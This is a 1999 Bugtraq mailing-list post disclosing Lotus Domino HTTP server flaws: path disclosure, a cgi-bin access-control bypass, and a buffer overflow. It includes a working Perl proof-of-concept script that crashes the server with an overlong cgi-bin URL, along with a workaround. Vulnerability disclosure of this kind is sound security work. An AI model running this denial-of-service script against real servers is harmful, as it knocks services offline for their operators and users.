Bugtraq mailing list archives
serious Lotus Domino HTTP denial of service
From: Alain.Thivillon () HSC FR (Alain Thivillon)
Date: Tue, 21 Dec 1999 11:42:13 +0100
Greetings, Lotus Domino HTTP server can be used as a traditional Web server, with static html documents and cgi-bin scripts handling. These features are turned on by default, and use /cgi-bin virtual path, mapped to <NOTESDATA>\domino\cgi-bin directory. When doing audit of these functions, we found three vulnerabilites in handling of cgi requests: 1. Domino server exposes configuration of local filesystem: When requesting http://server/cgi-bin/blabla, HTTP response is Error 500 Bad script request -- no variation of 'c:/notes/data/domino/cgi-bin/blabla' is executable This can be used to obtain OS and installation details. 2. Turning off anonymous access in server document of Notes Name & Adress Book as no effect for cgi-bin directory : anonymous access is still permitted. The same applies to "SSL redirection of entire server" : cgi-bin can still be accessed via HTTP port. 3. Now the worst ... Handling of response to bad requests (see 1) is vulnerable to a buffer overflow : by sending a large URL relative to cgi-bin, HTTP task crashes immediatly, and does not service requests anymore (including standard Notes database access by HTTP). If Domino is launched as a NT service, service will not stop completly, you need to kill remaining processes (using kill.exe in Reskit) or reboot Windows NT. We notice that all requests does not crash server, but sending 'GET /cgi-bin/... (800 .) aaaa (4000 a) HTTP/1.0' kills nHTTP.exe every time. We were able to reproduce this on all 4.6.X series, including 4.6.6b, wich seems the last version accessible on www.notes.net. I was not able to overwrite return address (just DS), but i made very few tests, and buffer overflow is maybe exploitable to execute arbitrary code. I didn't test Denial of service on Unix versions, but problems 1. and 2. are present. The same remark applies to Domino 5.x. We send several emails to security () lotus com in the past 10 days, we receive no answers nor bounces. Demonstration script using Perl LWP module is given below. A nessus plugin will be available in a few hours on http://www.nessus.org/, thanks to Renaud Deraison. Workaround: If you don't use cgi-bin on your Domino server, change cgi-bin virtual directory in server document to something impossible to guess. Leaving field empty has no effect. We didn't find an definitive way to stop cgi-bin handling. Demonstration script: #!/usr/bin/perl -w # This will crash Lotus Domino Server (tested on 4.6.4,4.6.5,4.6.6 and # 4.6.6b). # (c) Alain Thivillon, Stephane Aubert and Herve Schauer Consultants 1999 use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("a"); $target='Insertyourtargetnamehere'; $url="http://".$target."/cgi-bin/".'.'x800; $url.='a'x4000; my $req = new HTTP::Request GET => $url; my $res = $ua->request($req); if ($res->is_success) { print $res->content; } else { print "Well done, Joe\n"; } -- Alain Thivillon -+- Alain.Thivillon () hsc fr -+- Hervé Schauer Consultants The world is ending in 10 days, 12 hours, 45 min, 55 sec : save your buffers
Current thread:
- Re: Announcement: Solaris loadable kernel module backdoor, (continued)
- Re: Announcement: Solaris loadable kernel module backdoor Marc Esipovich (Dec 22)
- Re: Announcement: Solaris loadable kernel module backdoor Steven Alexander (Dec 23)
- Re: Announcement: Solaris loadable kernel module backdoor Rainer Link (Dec 22)
- Re: Announcement: Solaris loadable kernel module backdoor Keith Owens (Dec 22)
- Re: Groupewise Web Interface satherrl () MAILPOINT DSSRG CURTIN EDU AU (Dec 21)
- Norton Email Protection Remote Overflow (Addendum) Matt Conover (Dec 20)
- procmail / Sendmail - five bugs Michal Zalewski (Dec 23)
- Re: procmail / Sendmail - five bugs Rob Jones (Dec 20)
- Re: procmail / Sendmail - five bugs Michal Zalewski (Dec 22)
- FTPPro insecuities The Wall (Dec 27)
- serious Lotus Domino HTTP denial of service Alain Thivillon (Dec 21)
- More details on the WU-FTPD configuration vulnerability. suid (Dec 21)
- Microsoft Security Bulletin (MS99-058) Aleph One (Dec 21)
- Microsoft Security Bulletin (MS99-061) Aleph One (Dec 21)
- More Netscape Passwords Available. Rob Jones (Dec 21)
- UnixWare i2odialogd remote root exploit Brock Tellier (Dec 21)
- IE 5.01 vulnerabilities in external.NavigateAndFind() Georgi Guninski (Dec 22)
- Solaris 2.7 dmispd local/remote problems Brock Tellier (Dec 22)
- Multiple vulnerabilites in glFtpD (current versions) suid (Dec 22)
- Re: Multiple vulnerabilites in glFtpD (current versions) Per Lejontand (Dec 23)
- Re: Multiple vulnerabilites in glFtpD (current versions) The Tree of Life (Dec 23)